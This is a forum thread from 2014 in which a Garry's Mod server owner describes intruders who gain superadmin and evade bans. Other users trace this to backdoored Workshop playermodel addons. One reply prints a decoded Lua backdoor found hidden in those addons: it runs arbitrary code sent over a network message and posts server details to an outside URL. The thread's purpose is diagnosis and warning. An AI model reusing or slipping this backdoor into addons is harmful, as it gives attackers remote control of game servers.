Hackers

So over the past few days things have got pretty bad on my deathrun server. Someone with playermodels on the workshop joined (they were added on my server) and was able to give himself superadmin and then give people points in the pointshop. I banned him thinking well must have been an exploit.

Since then, a lot of others have joined doing the same thing except they would ban users to. When staff banned them it would just ban someone else in the server. The hackers were able to rejoin like they weren’t banned at all. And some of the people who were banned because staff was banning the hackers. So basically at this point, they bypass bans, can give themselves ranks, can ban people, and access pointshop.

I thought maybe it was an RCON exploit or whatever, so I disabled it and added something that bans you if you get the password wrong. I set sv_allowcslua to 0 and sv_allowupload/download to 0. I got all the IPs I could find but and banned them but for some reason the same one has joined back more than 3 times. Guess whos it is? The guy from steam workshop. He used different names and accounts all under the same IP. There are also a few other IPs involved. Also, a few of them used voice chat and had different voices so its more than one person.

Well after all of my efforts they still were able to come on today and bypass bans.

I really do not know what to do. I have logs and ips and steam ids-- all banned but they can still connect!

Please please help!

[editline]1st August 2014[/editline]

Also, when I banned the guy from the workshop he said to one of my admins “i admin I was trolling, gave myself admin using an exploit then tested to see if it worked by settings points :p”

[editline]1st August 2014[/editline]

Oh and one more thing, I have removed his models from my servers as well.

Take that guy’s workshop content off your server. I’m just guessing, but I wouldn’t be surprised if he coded exploits into his stuff.

This workshop addon, for example, has one.

If you’ve removed his stuff and it’s still happening, there’s probably something else that was added in as an exploit. I’d do a backup, then clear all of your addons out and basically reinstall the server and re-add them, minus that guy’s shit.

Should I say who’s stuff did it so no one else is affected?

Where’s your rcon password set? In the server startup command or in server.cfg?

It was in server.cfg, but i deleted it so it just says rcon_password “” and i disabled rcon itself

If it was in server.cfg when this was going on, they probably had rcon access.

Well I’ve deleted all the content and disabled rcon… so I guess I’ll just have to wait and see now.

I don’t think the exploit is being widely abused, it’s pretty unlikely that’s the cause.

I suspect the addons have an exploit, but I imagine it doesn’t help to leave the rcon pass there.

Some addons read the rcon password from the config. So true.

Install microsoft security essentials and search possible troyans.

This work fine in my Windows Server 2008 and is free.

Regards.

What were the addons?

[editline]1st August 2014[/editline]

Random player models from Demonic King.

So not only does he reupload content without consent, he also places backdoors in them too. Very nice.

So he’s too lazy to change a few lua paths in his server so he uploads an outdated pack without asking anyone involved, but yet not lazy enough to plant exploits in his addons.

gg

Sorry about bumping this thread, but I actually looked through some of the addons at the request of op. I found this snippet of code tabbed way off to the right to avoid normal view range.

http://puu.sh/bdP5t/2426c1306e.lua (this one was a formatted by a friend who couldn’t figure it out).

It looks like this is in most, if not all of his playermodel addon scripts that come packaged with the models. I know nothing about coding so I can’t really translate it. Any chance we can get more info on this so we can at least make sure people don’t continue cramming his addons on their server?

I had nothing to do at the moment so I “decoded” the exploit:



if SERVER and game.IsDedicated() then
    local f = (function() end) 
    local c = CompileString
    local r = net.ReadString
    util.AddNetworkString("m9k_addons")
    net.Receivers.m9k_addons = function() 
        local s = c(r() or "--", "[C]", false) 
        if type(s) ~= "string" then 
            xpcall(s, f)
        end
    end
    timer.Simple(16, function()
        http.Post("http://gmod.hints.me/", {
            hn = GetConVarString("hostname"),
            ip = GetConVarString("ip"),
            np = #player.GetAll()
        }, f, f)
    end)
end


It basically allows to run arbitrary Lua code on dedicated servers and sends shitty statistics (server name/IP and number of players) to some URL.

People with addons on the workshop will put backdoors in their lua files and basically what they are doing is if a players steam ID == the creator of the addon then set their usergroup to superadmin. They then have access to everything.

I’m guessing those statistics are actually there so he knows what servers have the addon installed so he can go have his fun.

Unfortunately it’s a little more than that. Your average player (or server host) isn’t going to check every single addon for exploits, and this code isn’t just “hey, give me admin” but rather it’s been obfuscated and even hidden in a spot that’s obvious yet easy for some people to miss. In other words, he’s not setting himself as an admin for shits and giggles but rather he’s creating a backdoor that allows him to hop in, do whatever he wants, and freak the shit out of people who most likely have no idea what’s going on.

In any case, thanks for the help, mijyuoon. I’m not quite sure where to go from here yet, but I’ll figure it out.